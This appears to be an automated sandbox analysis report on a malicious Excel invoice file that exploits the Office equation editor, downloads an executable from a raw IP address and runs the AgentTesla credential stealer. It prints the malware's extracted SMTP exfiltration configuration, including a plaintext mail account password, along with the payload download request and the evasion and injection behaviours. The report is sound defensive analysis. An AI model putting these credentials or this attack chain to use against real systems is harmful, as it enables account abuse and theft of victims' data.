Windows Analysis Report FACTURA 3879843.xlsx

Overview

General Information

Sample Name: FACTURA 3879843.xlsx
Analysis ID: 452698
MD5: 9ae3b1aa2c80f4e12e33569d7b5839df
SHA1: 8579f018a10f93cedbb73369fb8c7b66416d9846
SHA256: 82737660638921bf4d3e82bf4c059ec3cb0b61bd988365572bd4207b87ceb060
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Found malware configuration
Source: 7.2.vbc.exe.400000.1.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "katie.fox@snythomer.com", "Password": "wirelord3116", "Host": "us2.smtp.mailhostbox.com"}
Multi AV Scanner detection for domain / URL
Source: http://198.12.91.148/oso.exe Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for submitted file
Source: FACTURA 3879843.xlsx Virustotal: Detection: 30% Perma Link
Source: FACTURA 3879843.xlsx ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.12.91.148:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 75MB

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 16:18:32 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Thu, 22 Jul 2021 07:24:36 GMTETag: "f9800-5c7b12de621e5"Accept-Ranges: bytesContent-Length: 1021952Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 1d f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 32 0c 00 00 62 03 00 00 00 00 00 2e 51 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 10 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 50 0c 00 4b 00 00 00 00 80 0c 00 e8 5d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 31 0c 00 00 20 00 00 00 32 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 60 0c 00 00 02 00 00 00 36 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5d 03 00 00 80 0c 00 00 5e 03 00 00 38 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0f 00 00 02 00 00 00 96 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.148
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A2F8885.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /oso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.148Connection: Keep-Alive
Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.dr String found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp String found in binary or memory: http://pcLwYQ.com
Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.dr String found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
Source: vbc.exe, 00000007.00000002.2365402935.0000000005E10000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: 69CBECC2.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 7_2_003265D0 7_2_003265D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00325F48 7_2_00325F48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00322099 7_2_00322099
Source: C:\Users\Public\vbc.exe Code function: 7_2_00326480 7_2_00326480
Source: C:\Users\Public\vbc.exe Code function: 7_2_00325678 7_2_00325678
Source: C:\Users\Public\vbc.exe Code function: 7_2_00EC7846 7_2_00EC7846
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: FACTURA 3879843.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: oso[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: oso[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@6/13@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$FACTURA 3879843.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE964.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: FACTURA 3879843.xlsx Virustotal: Detection: 30%
Source: FACTURA 3879843.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: FACTURA 3879843.xlsx Static file information: File size 1227776 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: FACTURA 3879843.xlsx Initial sample: OLE indicators vbamacros = False
Source: FACTURA 3879843.xlsx Initial sample: OLE indicators encrypted = True
Source: initial sample Static PE information: section name: .text entropy: 7.56201911233
Source: initial sample Static PE information: section name: .text entropy: 7.56201911233
Source: oso[1].exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
Source: oso[1].exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
Source: oso[1].exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.cs High entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
Source: oso[1].exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.cs High entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
Source: oso[1].exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
Source: oso[1].exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
Source: oso[1].exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.cs High entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
Source: oso[1].exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.cs High entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
Source: oso[1].exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
Source: oso[1].exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.cs High entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
Source: oso[1].exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs High entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
Source: oso[1].exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
Source: oso[1].exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.cs High entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
Source: oso[1].exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.cs High entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
Source: vbc.exe.4.dr, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
Source: vbc.exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
Source: vbc.exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.cs High entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
Source: vbc.exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
Source: vbc.exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
Source: vbc.exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.cs High entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
Source: vbc.exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
Source: vbc.exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.cs High entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.cs High entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
Source: vbc.exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.cs High entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
Source: vbc.exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
